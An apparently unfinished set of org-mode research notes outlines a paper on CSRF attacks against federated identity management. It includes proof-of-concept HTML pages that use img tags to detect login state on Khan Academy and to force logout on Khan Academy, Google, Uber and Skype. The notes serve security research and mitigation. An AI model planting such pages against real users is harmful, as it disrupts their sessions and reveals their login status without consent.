* Paper Outline
** Working Title: Modeling and Mitigation of CSRF Attacks on FIM
- Summary of Abstract
** TODO Abstract
1/2 page
- Summary of Intro
*** Working Abstract:
Our abstract for now(verify) is something like this: we are showing that FIM is
not an all-encompassing security measure. CSRF attacks can still be carried out
on the application as that isnt even part of the model(here demo of regular
csrf attacks on intentionally vulnerable website). In addition FIM is weak to
another csrf attack: logout. Both these problems can be mitigted(hopefully)
using corp
** Introduction
2-3 pages
- Summary of paper
- Motivation
- Related Work
- 
** Motivation(Pitch)
- Why is it important
** Related Work
** Method and Technique
- What is FIM
** Modeling
- How we modeled it alloy
** Experimentation
- Implementation of experiments
** Conclusion
** Future Outlook





* Experiment
** Generic
*** Vulnerabilities Check
**** CSRF
**** Click jacking
**** cross site timing attack
- Mitigate atacks using corp extension. 
how: 
- fix one website, then based on e
*** Mitigation tests
- using corp extension

  
* Mitigation
Check with corp extension in chrome

* Robin Linus
- all the websits which use FIM, are vulnerable to click jacking which they are
  on the robin linus site.



* Attack 1 : Cross-Site Timing Attack
- Use with Khanacademy: if logged in logo will show up else not;.
#+BEGIN_SRC html :tangle khanacademychecklogin.html
<html>
  <head><title>Khanacademy Check Login Attack</title></head>
  <body>
    <img src="https://www.khanacademy.org/login?continue=%2Ffavicon.ico"/>
  </body>
  
</html>
#+END_SRC
* Attack Khanacademy Logout:
#+BEGIN_SRC html :tangle khanacademylogout.html
<html>
<head><title>Khanacademy Logout Attack</title></head>
<body>
<img src="https://khanacademy.org/logout?contine=/"/>
</body>
</html>
#+END_SRC
* Attack Google Logout
#+BEGIN_SRC html :tangle googlelogout.html
<html>
<head><title>Google Logout Attack</title></head>
<body>
<img src="https://accounts.google.com/logout"/>
</body>
</html>
#+END_SRC
* Uber logout
#+BEGIN_SRC html :tangle  uberlogout.html
<html>
<head><title>Attacker</title></head>
<body>
<img src="https://riders.uber.com/logout"/>
</body>
</html>
#+END_SRC
* Skype logout
#+BEGIN_SRC html :tangle skypelogout.html
<html>
<head><title>Attacker</title></head>
<body>
<img src="https://secure.skype.com/portal/logout"/>
</body>
</html>
#+END_SRC
* Super logout
#+BEGIN_EXAMPLE
https://superlogout.com
#+END_EXAMPLE
* SBI logout
